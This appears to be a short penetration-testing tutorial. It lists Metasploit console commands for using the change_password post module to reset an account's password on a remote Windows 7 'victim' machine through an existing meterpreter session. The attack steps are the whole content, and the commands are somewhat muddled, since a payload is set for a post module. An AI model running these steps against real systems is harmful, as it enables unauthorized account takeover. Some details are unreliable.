Categories

Archives

Kali Linux, Penetration Testing

Set New Password of Victim PC Remotely

This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a remote host to avoid the error, ‘System error 1907 has occurred,’ which is caused when the account policy enforces a password change before the next login.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/windows/manage/change_password

msf exploit (change_password)>set payload windows/meterpreter/reverse_tcp

msf exploit (change_password)>set old_password (Type your old password)

msf exploit (change_password)>set new_password (New password You want to set)

msf exploit (change_password)>set smbuser (User name of PC)

msf exploit (change_password)>set session 1

msf exploit (change_password)>exploit